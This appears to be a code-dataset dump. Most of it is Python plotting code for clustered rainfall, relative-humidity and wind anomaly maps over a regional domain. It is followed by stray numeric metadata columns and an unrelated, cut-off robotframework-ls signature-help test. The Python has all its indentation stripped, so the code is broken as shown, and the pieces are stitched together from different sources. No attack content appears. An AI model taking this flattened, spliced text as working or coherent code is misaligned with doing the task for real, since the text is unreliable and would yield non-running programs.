print(f"{utils.time_now()} - clus {cluster}")
rhum_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).rhum.mean("time")
mean = rhum_gridded_centroids-baseline
ax_rhum = fig.add_subplot(gs_rhum[cluster], projection=ccrs.PlateCarree())
ax_rhum.xaxis.set_major_formatter(model.lon_formatter)
ax_rhum.yaxis.set_major_formatter(model.lat_formatter)
ax_rhum.coastlines("50m", linewidth=.7, color='k')
ax_rhum.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax_rhum.set_facecolor('white')
ax_rhum.add_feature(cf.LAND, facecolor='k')
ax_rhum.set_extent([w,e,s,n])
if cluster < model.grid_width: # top ticks
ax_rhum.set_xticks(np.linspace(w,e, 5), crs=ccrs.PlateCarree())
ax_rhum.set_xticklabels(np.linspace(w,e, 5), rotation=55)
ax_rhum.xaxis.tick_top()
else: ax_rhum.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_rhum.set_yticks(np.linspace(s,n, 5), crs=ccrs.PlateCarree())
ax_rhum.yaxis.set_label_position("right")
ax_rhum.yaxis.tick_right()
else: ax_rhum.set_yticks([])
if cluster == 0: # title
ax_rhum.set_title(f"Anomalous RHUM, @ Pressure: {pressure}hpa, for model of: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E\ncluster no.{cluster+1}", loc='left')
else: ax_rhum.set_title(f"cluster no.{cluster+1}", loc='left')
Rhum = ax_rhum.contourf(lon, lat, mean,
# np.linspace(model.min_maxes['rhum_min'], model.min_maxes['rhum_max'], 21),
levels, cmap='BrBG', extend='both')
conts = ax_rhum.contour(Rhum, 'k:', linewidths=.5)
ax_rhum.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=10)
if cluster == model.cbar_pos: # cbar
axins_rhum = inset_axes(ax_rhum, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rhum.transAxes);
cbar_rhum = fig.colorbar(Rhum, cax=axins_rhum, label='Relative humidity anomaly (%)', orientation='horizontal', pad=0.01,
ticks = levels);
cbar_rhum.ax.xaxis.set_ticks_position('top')
cbar_rhum.ax.xaxis.set_label_position('top')
# break
print(f"==> Rhum plots plotted for {pressure}hpa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_rhum_Regionalonly_ANOM_v2-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
# sys.exit()
print(f"\n\nTime taken to plot RHUM ANOMALIES for regional: {utils.time_since(rhumstarttime)}.")
def print_rf_gt1mm_ANOM_Regionalonly(model, dest, optimal_k):
print('Printing RF gt1mm ANOM_regional')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
w_lim_regional = 96
e_lim_regional = 111.6
s_lim_regional = -4.5
n_lim_regional = 8
# RFprec_to_ClusterLabels_dataset = RFprec_to_ClusterLabels_dataset.sel(
# lon=slice(w_lim_regional, e_lim_regional),lat=slice(s_lim_regional, n_lim_regional))
# fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
# rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
# rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = get_RF_calculations(model, 'rf_ds_lon', regionalonly=True)
rf_ds_lat = get_RF_calculations(model, 'rf_ds_lat', regionalonly=True)
baseline = (get_RF_calculations(model, criteria="gt1mm", calculation="mean", clus="whole", regionalonly=True))
w = rf_ds_lon.min().values
e = rf_ds_lon.max().values
s = rf_ds_lat.min().values
n = rf_ds_lat.max().values
# baseline = np.mean(RFprec_to_ClusterLabels_dataset.precipitationCal > 1, axis=0) * 100
all_colors = np.vstack(plt.cm.seismic_r(np.linspace(0,1,51)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Anomaly for rainfall above 1mm, regional extent, for model of: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
# levels = [int(i) for i in np.linspace(-100,100,21)]
levels1 = np.linspace(-100,100,81)
levels2 = np.arange(-100, 105, 5)
for clus in range(optimal_k):
time.sleep(1); gc.collect()
print(f'\n{utils.time_now()}: {clus}.. ');
data = get_RF_calculations(model, criteria="gt1mm", calculation="mean", clus=clus, regionalonly=True)
# data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal.values
# mean = np.mean(data > 1, axis=0)*100
# mean = data-baseline
mean = data-baseline
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([w,e,s,n])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.ceil(w), np.floor(e)], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([np.ceil(w), np.floor(e)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
# levels,
levels1,
cmap=terrain_map,
extend='neither')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0.2)
ax_rf_plot.clabel(conts,
# conts.levels,
np.concatenate([levels2[:19], levels2[22:]]),
colors='k', inline=True, fmt='%1.f', fontsize=7)
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Proportion of grid with >1 mm rainfall (%) relative to whole dataset baseline', orientation='horizontal', pad=0.01,
# ticks=np.arange(0,100,10)
# ticks=levels
ticks=levels2
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
# break
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_rainday_gt1mm_Regionalonly_ANOM_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
# sys.exit()
def print_rf_gt50mm_ANOM_Regionalonly(model, dest, optimal_k):
print('Printing RF gt50mm ANOM_regional')
# RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
w_lim_regional = 96
e_lim_regional = 111.6
s_lim_regional = -4.5
n_lim_regional = 8
# RFprec_to_ClusterLabels_dataset = RFprec_to_ClusterLabels_dataset.sel(
# lon=slice(w_lim_regional, e_lim_regional),lat=slice(s_lim_regional, n_lim_regional))
# fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
# rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
# rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = get_RF_calculations(model, 'rf_ds_lon', regionalonly=True)
rf_ds_lat = get_RF_calculations(model, 'rf_ds_lat', regionalonly=True)
baseline = (get_RF_calculations(model, criteria="gt50mm", calculation="mean", clus="whole", regionalonly=True))
w = rf_ds_lon.min().values
e = rf_ds_lon.max().values
s = rf_ds_lat.min().values
n = rf_ds_lat.max().values
# baseline = np.mean(RFprec_to_ClusterLabels_dataset.precipitationCal > 50, axis=0) * 100
all_colors = np.vstack(plt.cm.seismic_r(np.linspace(0,1,11)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Anomaly for rainfall above 50mm, regional extent, for model of: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
# levels = [int(i) for i in np.linspace(-100,100,21)]
levels1 = np.linspace(-20,20,81)
levels2 = np.arange(-19, 21, 2)
for clus in range(optimal_k):
time.sleep(1); gc.collect()
print(f'\n{utils.time_now()}: {clus}.. ');
data = get_RF_calculations(model, criteria="gt50mm", calculation="mean", clus=clus, regionalonly=True)
# data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal.values
# mean = np.mean(data > 50, axis=0)*100
mean = data-baseline
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([w,e,s,n])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.ceil(w), np.floor(e)], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([np.ceil(w), np.floor(e)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
levels1,
cmap=terrain_map,
extend='neither')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0)
ax_rf_plot.clabel(conts,
# conts.levels,
np.concatenate([levels2[:9], levels2[11:]]),
colors='k', inline=True, fmt='%1.f', fontsize=8)
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Proportion of grid with >50 mm rainfall (%) relative to whole dataset baseline', orientation='horizontal', pad=0.01,
# ticks=np.arange(0,100,10)
# ticks=levels
ticks=levels2
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_heavy_gt50mm_Regionalonly_ANOM_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
# def get_baseline_gt1mm(RFprec_to_ClusterLabels_dataset):
# data = (RFprec_to_ClusterLabels_dataset.precipitationCal > 1).values
# return np.mean(data, axis=0) * 100
# def get_baseline_gt50mm(RFprec_to_ClusterLabels_dataset):
# data = (RFprec_to_ClusterLabels_dataset.precipitationCal > 50).values
# return np.mean(data, axis=0) * 100
# def get_baseline_90perc(RFprec_to_ClusterLabels_dataset):
# data = RFprec_to_ClusterLabels_dataset.precipitationCal.values
# return np.percentile(data, 90, axis=0)
# def plot_baseline(colscheme, baseline, levels, ticks, plotparams, title, filename, label, model, dest, RFprec_to_ClusterLabels_dataset):
def plot_baseline(colscheme, baseline_criteria, calculation, levels, ticks, plotparams, title, filename, label, model, dest):
# baseline = baseline(RFprec_to_ClusterLabels_dataset)
baseline = get_RF_calculations(model, baseline_criteria, calculation=calculation, clus="whole")
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon")
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat")
fig = plt.Figure(figsize=(15,10))
ax_rf_plot = fig.add_subplot(111, projection=ccrs.PlateCarree())
ax_rf_plot.set_title(f"{title}")
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor(plotparams[0])
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.7, color=plotparams[1])
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color=plotparams[2], linestyle='dashed')
ax_rf_plot.set_xticks([np.round(i,0) for i in np.linspace(model.LON_W,model.LON_E,9)], crs=ccrs.PlateCarree())
ax_rf_plot.xaxis.tick_top()
ax_rf_plot.set_yticks([np.round(i,0) for i in np.linspace(model.LAT_S,model.LAT_N,9)], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
# RF = ax_rf_plot.contourf(RFprec_to_ClusterLabels_dataset.lon,
# RFprec_to_ClusterLabels_dataset.lat, baseline.T,
# levels, cmap=colscheme, extend='neither')
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, baseline.T,
levels, cmap=colscheme, extend='neither')
conts = ax_rf_plot.contour(RF, linewidths=0,
levels=levels,
colors=('y',),linestyles=('-',))
ax_rf_plot.clabel(conts, conts.levels, colors='k',
inline=True, fmt='%1.0f', fontsize=10)
fig.colorbar(RF, ticks=ticks, label=label)
fn = f'{dest}/{model.month_names_joined}_{filename}_{model.gridsize}x{model.gridsize}'
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_RF_baselines(model, dest, optimal_k, too_large):
print(f'{utils.time_now()} - Printing RF gt1mm, gt50mm and 90th percentile baselines.')
# RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path).sel(
# lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N))
a = plt.cm.YlOrRd(np.linspace(.9, .2, 5))
b = plt.cm.YlGnBu(np.linspace(.2, .8, 10))
all_colors = np.vstack((a,b))
colscheme_gt1mm = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
zero_to_ten = plt.cm.gist_stern(np.linspace(1, .2, 2))
eleven_to_25 = plt.cm.gnuplot2(np.linspace(.9, 0.25, 10))
twnty5_to_40 = plt.cm.gist_earth(np.linspace(0.15, 0.9, 8))
all_colors = np.vstack((zero_to_ten, eleven_to_25, twnty5_to_40))
colscheme_gt50mm = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
z = plt.cm.gist_stern(np.linspace(1, .9, 1))
a = plt.cm.terrain(np.linspace(0.6, .1, 4))
b = plt.cm.gnuplot2(np.linspace(0.4, .9, 12))
all_colors = np.vstack((z, a, b))
colscheme_90perc = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
#baseline_gt1mm = np.mean((RFprec_to_ClusterLabels_dataset.precipitationCal > 1).values, axis=0)*100
#baseline_gt50mm = np.mean((RFprec_to_ClusterLabels_dataset.precipitationCal > 50).values, axis=0)*100
#baseline_90perc = np.percentile(RFprec_to_ClusterLabels_dataset.precipitationCal,90,axis=0)
# baseline_gt1mm = get_baseline_gt1mm
# baseline_gt50mm = get_baseline_gt50mm
# baseline_90perc = get_baseline_90perc
baseline_gt1mm_criteria = "gt1mm"
baseline_gt50mm_criteria = "gt50mm"
baseline_90perc_criteria = "90perc"
calculation_gt1mm = "mean"
calculation_gt50mm = "mean"
calculation_90perc = "90perc"
levels_gt1mm = np.linspace(0,100,11)
levels_gt50mm = np.linspace(0,100,101)
levels_90perc = np.arange(0,500,12.5)
ticks_gt1mm = np.arange(0,100,10)
ticks_gt50mm = np.arange(0,100,10)
ticks_90perc = np.arange(0,500,50)
plotparams_gt1mm = ['k','w','w']
plotparams_gt50mm = ['white', 'k','k']
plotparams_90perc = ['white', 'k','k']
colschemes = [colscheme_gt1mm, colscheme_gt50mm, colscheme_90perc]
# baselines = [baseline_gt1mm, baseline_gt50mm, baseline_90perc]
baseline_criterias = [baseline_gt1mm_criteria, baseline_gt50mm_criteria, baseline_90perc_criteria]
calculation_ls = [calculation_gt1mm, calculation_gt50mm, calculation_90perc]
levels_ls = [levels_gt1mm, levels_gt50mm, levels_90perc]
ticks_ls = [ticks_gt1mm, ticks_gt50mm, ticks_90perc]
plotparams_ls = [plotparams_gt1mm, plotparams_gt50mm, plotparams_90perc]
titles = ['Plot of gt1mm baseline',
'Plot of gt50mm baseline',
'Plot of 90-percentile baseline']
filenames = ['RFplot_rainday_gt1mm_baseline',
'RFplot_heavy_gt50mm_baseline',
'RFplot_90th_percentile_baseline']
labels = ['Proportion of grid with gt1mm RF (%)',
'Proportion of grid with gt50mm RF (%)',
'90th percentile average over grid (mm)']
count=0
# for colscheme, baseline, levels, ticks, plotparams, title, filename, label in zip(
# colschemes, baselines, levels_ls, ticks_ls, plotparams_ls, titles, filenames, labels):
for colscheme, baseline_criteria, calculation, levels, ticks, plotparams, title, filename, label in zip(
colschemes, baseline_criterias, calculation_ls, levels_ls, ticks_ls, plotparams_ls, titles, filenames, labels):
#print(f'ERRRRRRRRR {count}')
count += 1
if count != 3: # 90th perc baseline is not possible with my machine if domain extent is too huge
continue
print(f'{utils.time_now()} - Plotting {filename}...')
# plot_baseline(colscheme, baseline, levels, ticks, plotparams, title, filename, label, model, dest, RFprec_to_ClusterLabels_dataset)
plot_baseline(colscheme, baseline_criteria, calculation, levels, ticks, plotparams, title, filename, label, model, dest)
def get_baseline_quiver(target_ds_withClusterLabels, pressure, skip_interval):
uwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).uwnd.mean(
"time")[::skip_interval, ::skip_interval].values
vwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).vwnd.mean(
"time")[::skip_interval, ::skip_interval].values
wndspd = np.hypot(vwnd_gridded_centroids,uwnd_gridded_centroids)
u = uwnd_gridded_centroids/wndspd;
v = vwnd_gridded_centroids/wndspd;
return wndspd, u, v
def print_quiver_baseline(model, dest, optimal_k):
print(f'{utils.time_now()} - Printing quiver baselines.')
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
area = (model.LON_E-model.LON_W)*(model.LAT_N-model.LAT_S)
coastline_lw = .8
minshaft=2; scale=33
if area > 3000: skip_interval=4
elif 2000 < area <= 3000: skip_interval=3
elif 500 < area <= 2000 : skip_interval=2; minshaft=3; scale=33
else: skip_interval=1; minshaft=3; scale=33
lon_qp = model.X[::skip_interval].values
lat_qp = model.Y[::skip_interval].values
baseline = get_baseline_quiver
title = 'Quiver plot baseline'
filename = 'qp_baseline'
label = 'Quiver (m/s)'
print(f'{utils.time_now()} - Plotting {filename}...')
for idx, pressure in enumerate(model.uwnd_vwnd_pressure_lvls):
print(f'Currently on {pressure}hpa...')
fig = plt.Figure(figsize=(15,10))
ax_qp = fig.add_subplot(111, projection=ccrs.PlateCarree())
wndspd, u, v = get_baseline_quiver(target_ds_withClusterLabels, pressure, skip_interval)
ax_qp.xaxis.set_major_formatter(model.lon_formatter)
ax_qp.yaxis.set_major_formatter(model.lat_formatter)
ax_qp.set_facecolor('white')
ax_qp.add_feature(cf.LAND,facecolor='silver')
ax_qp.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_qp.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_qp.xaxis.tick_top()
ax_qp.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_qp.yaxis.set_label_position("right")
ax_qp.yaxis.tick_right()
ax_qp.set_title(f"Pressure: {pressure} hpa, {title}", loc='left')
spd_plot = ax_qp.contourf(lon_qp, lat_qp, wndspd, np.linspace(0,18,19),
transform=ccrs.PlateCarree(), cmap='terrain_r',
alpha=1)
Quiver = ax_qp.quiver(lon_qp, lat_qp, u, v, color='Black', minshaft=minshaft, scale=scale)
conts = ax_qp.contour(spd_plot, 'w', linewidths=.3)
ax_qp.coastlines("50m", linewidth=coastline_lw, color='orangered')
ax_qp.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax_qp.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=5)
cbar_qp = fig.colorbar(spd_plot, label=label, orientation='horizontal')
cbar_qp.ax.xaxis.set_ticks_position('top')
cbar_qp.ax.xaxis.set_label_position('top')
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f'{dest}/{model.month_names_joined}_{filename}-at-{pressure}hpa_{model.gridsize}x{model.gridsize}'
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_quiver_baseline_regional(model, dest, optimal_k):
print(f'{utils.time_now()} - Printing quiver baselines.')
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
w_lim_regional = 96
e_lim_regional = 111.6
s_lim_regional = -4.5
n_lim_regional = 8
target_ds_withClusterLabels = target_ds_withClusterLabels.sel(lon=slice(w_lim_regional, e_lim_regional),lat=slice(n_lim_regional, s_lim_regional))
area = (model.LON_E-model.LON_W)*(model.LAT_N-model.LAT_S)
coastline_lw = .8
minshaft=2; scale=33
if area > 3000: skip_interval=4
elif 2000 < area <= 3000: skip_interval=3
elif 500 < area <= 2000 : skip_interval=2; minshaft=3; scale=33
else: skip_interval=1; minshaft=3; scale=33
skip_interval=1
# lon_qp = model.X[::skip_interval].values
# lat_qp = model.Y[::skip_interval].values
lon_qp = target_ds_withClusterLabels.lon
lat_qp = target_ds_withClusterLabels.lat
w = lon_qp.min().data
e = lon_qp.max().data
s = lat_qp.min().data
n = lat_qp.max().data
baseline = get_baseline_quiver
title = 'Quiver plot baseline (Regional-only)'
filename = 'qp_baseline_Regionalonly'
label = 'Quiver (m/s)'
print(f'{utils.time_now()} - Plotting {filename}...')
for idx, pressure in enumerate(model.uwnd_vwnd_pressure_lvls):
print(f'Currently on {pressure}hpa...')
fig = plt.Figure(figsize=(15,10))
ax_qp = fig.add_subplot(111, projection=ccrs.PlateCarree())
wndspd, u, v = get_baseline_quiver(target_ds_withClusterLabels, pressure, skip_interval)
ax_qp.xaxis.set_major_formatter(model.lon_formatter)
ax_qp.yaxis.set_major_formatter(model.lat_formatter)
ax_qp.set_facecolor('white')
ax_qp.add_feature(cf.LAND,facecolor='silver')
# ax_qp.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_qp.set_extent([w,e,s,n])
ax_qp.set_xticks(np.linspace(w,e, 5), crs=ccrs.PlateCarree())
ax_qp.set_xticklabels(np.linspace(w,e, 5), rotation=55)
# ax_qp.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_qp.xaxis.tick_top()
ax_qp.set_yticks(np.linspace(s,n, 5), crs=ccrs.PlateCarree())
# ax_qp.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_qp.yaxis.set_label_position("right")
ax_qp.yaxis.tick_right()
ax_qp.set_title(f"Pressure: {pressure} hpa, {title}", loc='left')
spd_plot = ax_qp.contourf(lon_qp, lat_qp, wndspd, np.linspace(0,18,19),
transform=ccrs.PlateCarree(), cmap='terrain_r',
alpha=1)
Quiver = ax_qp.quiver(lon_qp, lat_qp, u, v, color='Black', minshaft=minshaft, scale=scale)
conts = ax_qp.contour(spd_plot, 'w', linewidths=.3)
ax_qp.coastlines("50m", linewidth=coastline_lw, color='orangered')
ax_qp.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax_qp.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=5)
cbar_qp = fig.colorbar(spd_plot, label=label, orientation='horizontal')
cbar_qp.ax.xaxis.set_ticks_position('top')
cbar_qp.ax.xaxis.set_label_position('top')
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f'{dest}/{model.month_names_joined}_{filename}-at-{pressure}hpa_{model.gridsize}x{model.gridsize}'
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def get_baseline_rhum(target_ds_withClusterLabels, pressure):
rhum_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).rhum.mean("time")
return rhum_gridded_centroids
def print_rhum_baseline(model, dest, optimal_k):
print(f'{utils.time_now()} - Printing RHUM baselines.')
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
baseline = get_baseline_quiver
title = 'Relative humidity baseline'
filename = 'rhum_baseline'
label = 'Relative humidity (%)'
print(f'{utils.time_now()} - Plotting {filename}...')
for idx, pressure in enumerate(model.rhum_pressure_levels):
print(f'Currently on {pressure}hpa...')
fig = plt.Figure(figsize=(15,10))
ax_rhum = fig.add_subplot(111, projection=ccrs.PlateCarree())
rhum_gridded_centroids = get_baseline_rhum(target_ds_withClusterLabels, pressure)
ax_rhum.coastlines("50m", linewidth=.7, color='w')
ax_rhum.add_feature(cf.BORDERS, linewidth=.5, color='w', linestyle='dashed')
ax_rhum.set_facecolor('white')
ax_rhum.add_feature(cf.LAND, facecolor='w')
ax_rhum.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rhum.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_rhum.xaxis.tick_top()
ax_rhum.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_rhum.yaxis.set_label_position("right")
ax_rhum.yaxis.tick_right()
ax_rhum.set_title(f"Pressure: {pressure} hpa, {title}", loc='left')
normi = mpl.colors.Normalize(vmin=model.min_maxes['rhum_min'], vmax=model.min_maxes['rhum_max']);
Rhum = ax_rhum.contourf(model.X, model.Y, rhum_gridded_centroids,
np.linspace(model.min_maxes['rhum_min'], model.min_maxes['rhum_max'], 21),
norm=normi, cmap='jet_r')
conts = ax_rhum.contour(Rhum, 'k:', linewidths=.5)
ax_rhum.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=10)
cbar = fig.colorbar(Rhum, label=label, orientation='horizontal')
cbar.ax.xaxis.set_ticks_position('top')
cbar.ax.xaxis.set_label_position('top')
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f'{dest}/{model.month_names_joined}_{filename}-at-{pressure}hpa_{model.gridsize}x{model.gridsize}'
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
| 48.933264
| 301
| 0.654567
| 27,358
| 188,442
| 4.24947
| 0.031801
| 0.023224
| 0.027732
| 0.043111
| 0.892084
| 0.880506
| 0.870107
| 0.858348
| 0.846117
| 0.832535
| 0
| 0.030079
| 0.210845
| 188,442
| 3,850
| 302
| 48.945974
| 0.751691
| 0.1329
| 0
| 0.749708
| 0
| 0.056831
| 0.149278
| 0.036803
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019852
| false
| 0
| 0.007007
| 0
| 0.033087
| 0.081744
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d8837c4fdc3c4488b67d13e0418faf011088b935
| 18,485
|
py
|
Python
|
robotframework-ls/tests/robotframework_ls_tests/test_signature_help.py
|
GLMeece/robotframework-lsp
|
dc9c807c4a192d252df1d05a1c5d16f8c1f24086
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
robotframework-ls/tests/robotframework_ls_tests/test_signature_help.py
|
GLMeece/robotframework-lsp
|
dc9c807c4a192d252df1d05a1c5d16f8c1f24086
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
robotframework-ls/tests/robotframework_ls_tests/test_signature_help.py
|
GLMeece/robotframework-lsp
|
dc9c807c4a192d252df1d05a1c5d16f8c1f24086
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
def test_signature_help_basic(workspace, libspec_manager, data_regression):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
from robocorp_ls_core.lsp import MarkupKind
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Test Cases ***
Log It
Log """,
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
result = signature_help(completion_context)
signatures = result["signatures"]
# Don't check the signature documentation in the data regression so that the
# test doesn't become brittle.
docs = signatures[0].pop("documentation")
assert sorted(docs.keys()) == ["kind", "value"]
